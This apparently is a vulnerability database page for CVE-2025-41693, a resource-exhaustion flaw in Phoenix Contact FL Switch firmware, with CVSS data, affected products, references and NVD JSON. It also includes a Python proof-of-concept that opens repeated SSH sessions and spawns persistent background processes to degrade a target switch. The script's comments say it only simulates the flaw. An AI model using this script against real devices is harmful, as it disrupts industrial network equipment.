CVE-2025-41693

Description

A low privileged remote attacker can use the ssh feature to execute commands directly after login. The process stays open and uses resources which leads to a reduced performance of the management functions. Switching functionality is not affected.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:phoenixcontact:fl_switch_2708_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2708_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2708_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2708:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2608_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2608_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2608_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2608:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:phoenixcontact:fl_switch_2516_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:phoenixcontact:fl_switch_2516_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE

VDE (Virtual Distributed Ethernet) - 特定版本待官方确认

建议查看官方公告 https://certvde.com/de/advisories/VDE-2025-071 获取完整版本列表

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-41693 PoC - SSH Resource Exhaustion
# This PoC demonstrates how an attacker can execute commands via SSH
# that persist and consume system resources

import paramiko
import time
import sys

def exploit_ssh(target_ip, username, password, num_sessions=5):
    """
    PoC for CVE-2025-41693
    Demonstrates command execution after login via SSH
    that causes resource exhaustion
    """
    print(f"[*] Targeting: {target_ip}")
    print(f"[*] Username: {username}")
    print(f"[*] Starting exploitation...")
    
    for i in range(num_sessions):
        try:
            client = paramiko.SSHClient()
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            client.connect(target_ip, username=username, password=password, timeout=10)
            
            # Execute command that persists and consumes resources
            # This simulates the vulnerability where processes stay open
            stdin, stdout, stderr = client.exec_command('while true; do sleep 10; done &')
            
            print(f"[+] Session {i+1}: Command executed, process spawned")
            
        except Exception as e:
            print(f"[-] Session {i+1} failed: {str(e)}")
    
    print("[*] Exploitation complete - system resources consumed")
    print("[*] Management functions may be degraded")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python3 poc.py <target_ip> <username> <password>")
        sys.exit(1)
    
    exploit_ssh(sys.argv[1], sys.argv[2], sys.argv[3])

# Example remediation command:
# ssh user@target 'pkill -f "sleep 10"'  # Kill orphaned processes

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41693
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41693
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41693/
[4] VulDB https://vuldb.com/cve/CVE-2025-41693
[5] https://certvde.com/de/advisories/VDE-2025-071

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41693", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:48.390", "lastModified": "2025-12-19T18:11:57.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A low privileged remote attacker can use the ssh feature to execute commands directly after login. The process stays open and uses resources which leads to a reduced performance of the management functions. Switching functionality is not affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2708_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "2084EFDB-9B37-4B62-8F09-C0A478D225F5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2708_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "D1E0F77C-F116-4BF6-9ED4-39C5B2BE45D0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2708_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "0F69B73C-5009-4FDE-AC40-03089D1724DB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2708:-:*:*:*:*:*:*:*", "matchCriteriaId": "ACF0F7C6-D8C8-409D-B32E-33651C2768D3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2608_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "9D8B1EE5-CD80-4963-8E64-57ED5B75A236"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2608_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "7E2028DD-24BD-4541-B437-E7F97420BECE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2608_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "FEB4D4F4-DAA9-4D15-BD23-D2F8D20651F0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2608:-:*:*:*:*:*:*:*", "matchCriteriaId": "9066088C-2056-446A-A835-3A4F8EC71F69"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2516_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "3B6BC580-8BDE-458D-852C-09E54FD43F36"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2516_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "D25577D8-A076-4950-B28B-5587DF927425"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2516_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "E254EF2F-B597-4A4E-A6B0-2812F8B039A5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2516:-:*:*:*:*:*:*:*", "matchCriteriaId": "662FD579-22E7-4169-8FD0-F0F48FDAEF09"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2514-2sfp_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "A835F624-1034-4652-8BDB-A44856DB57C8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2514-2sfp_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "367E34FE-E7B4-436B-BF7D-2B794518DAD1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2514-2sfp_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "F02C9D10-B352-4D56-98A3-155129A97A1A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2514-2sfp:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D9F679F-A6F5-42F8-A269-FF7EA6EEDBAC"}]}]}, ... (truncated)